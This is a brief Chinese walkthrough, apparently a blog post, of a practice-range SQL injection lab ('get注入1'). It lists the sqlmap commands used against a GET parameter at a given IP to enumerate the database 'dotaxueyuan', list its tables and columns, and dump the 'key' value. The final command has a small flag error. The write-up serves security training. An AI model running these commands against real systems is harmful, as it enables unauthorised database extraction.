1、点开链接进入靶场
2、直接sqlmap拖库:sqlmap -u http://120.25.24.45:30833/index.php?user=harry --current-db
得到数据库名为"dotaxueyuan"
3、看一下这个库的表:sqlmap -u http://120.25.24.45:30833/index.php?user=harry -D dotaxueyuan --tables
发现里面有key和users两个表
3、猜测通关的key藏在key表中,查看该表的列
sqlmap -u http://120.25.24.45:30833/index.php?user=harry -D dotaxueyuan -T key --columns
得到id和key两列
4、查看key这列内容sqlmap -u http://120.25.24.45:30833/index.php?user=harry -D dotaxueyuan --tables -C key --dump
最后拿到了key
东塔靶场:SQL注入之get注入1
最新推荐文章于 2024-05-22 20:01:38 发布